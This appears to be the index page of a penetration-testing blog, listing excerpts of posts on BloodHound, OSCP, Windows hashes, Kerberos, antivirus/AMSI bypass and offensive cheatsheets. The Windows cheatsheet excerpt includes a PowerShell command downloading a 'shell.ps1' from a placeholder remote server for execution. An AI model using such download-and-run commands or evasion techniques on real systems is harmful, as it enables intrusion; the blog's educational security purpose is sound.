While flying through some clouds and on my way to enjoy some holidays on the other side of the globe, the thought about the current status on cloud environments is keeping me awake. “It feels like cloud security is still in it’s infancy!?”, “How long did it actually take, to get to the current status on On-premise AD security?”, “What’s the current status on cloud environments?”, “How long did it take to get to this state? Read more...

The first part of my BloodHound post was about the setup and usage of the tool. This part will mainly focous on the built-in queries and some small tips and tricks. I think the only way to fully grasp BloodHound is by frequently using it. Built-in queries After dumping our raw data with SharpHound1, it’s time to get to work. BH has some built-in queries which helps us to get a quick overview of the domain we are facing. Read more...

“Die Zahl der Angriffe auf IT- und OT-Infrastrukturen hat in den letzten Jahren drastisch zugenommen.” Solche und ähnliche Aussagen finden sich mittlerweile nicht mehr nur auf einschlägigen Nachrichtenseiten im Internet. Das Verständnis darüber, dass Cyberangriffe von Kriminellen keinesfalls Fiktion aus Hollywood sind, dringt langsam aber sicher in das Bewusstsein der Menschen1. Bedrohungen Was sind eigentlich die wesentlichen Bedrohungen denen Unternehmen oder immer häufiger Städte/Kommunen (z.B. Witten2 und Schwerin3) ausgesetzt sind? Meistens verfolgen Kriminelle die Absicht Lösegelder zu erbeuten. Read more...

A lot of organizations and companies run antivirus software on their users clients. Users should be protected from themselves by preventing the execution of .exe files or scripts. Through GPOs and standard tools of the OS, this can be achieved. In this post we’ll be mainly talking about how to bypass tools like AMSI1 and Windows Defender. Antivirus Software The first AV software originated back in 1972. Since the first known Virus was the so called “Creeper Virus”2, Ray Tomlinson used to write the “Reaper”3, a program to remove it. Read more...

There are tons of writeups on the internet from people who completed their OSCP certification, and I guess most of them are written better than this version. But anyway… Let’s jump in. Lab As soon as you get access to the lab, you will notice a lot of machines and different networks, which you can’t access at first. There is a so called learning path1, which suggests a few easy, medium and hard machines and their respective IP addresses. Read more...

So this is the windows equivalent of my post about linux cheatsheets. A lot of the following commands are from labs, cheatsheets, writeups, from friends and colleagues, trial and error and also copied from famous places like hacktricks and ired.team. I also have grepable cheatsheets to download on my GitHub. Powershell Download from remote Webserver PS> Invoke-WebRequest -Uri "http://<ip>:<port>/shell.ps1." -OutFile "C:\path\file" With the following command, Powershell downloads the file and executes it immediately Read more...

Writing a full hands-on of BloodHound takes more time than I thought, hence Part II is going to be delayed until I’m fully satisfied with the results. Thus I thought I will share some of my Linux cheats which I use (mostly for enumeration and privilege escalation stuff). A lot of the following commands are from labs, cheatsheets, writeups, from friends and colleagues, trial and error and also copied from famous places like hacktricks and ired. Read more...

What is BloodHound? BloodHound is a single page Javascript web application, built on top of Linkurious, compiled with Electron, with a Neo4j database fed by a PowerShell ingestor. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. Read more...

All the different types of Windows hashes can be confusing sometimes. So to clear thinks up a little bit, I wrote some Key points to help understand what most of the stuff like LM, NTLM and DCC is all about. An excellent writeup for NTLM relaying1 is from byt3bl33d3r. All the other sources2 3 4 can be found in the footnotes. Hash types LM Hashes5 Since OS/2 (ca. 1980) in use Limited character set - everything is an CAPS and a 7 char character-limit When hashing, the PW is padded to 14 characters with zeros and encrypted with DES Very easily crackable - found only in exceptions in NTDS. Read more...

Definition: Kerberos Kerberos (/ˈkɜːrbərɒs/) is a computer-network authentication protocol that works on the basis of tickets to allow nodes communicating over a non-secure network to prove their identity to one another in a secure manner.1 There is also the MIT version of Kerberos, but it’s slightly different than the Microsoft2 implementation.3 Kerberos is also the three headed dog who guards the entrance to the underworld in greek mythology.4 Read more...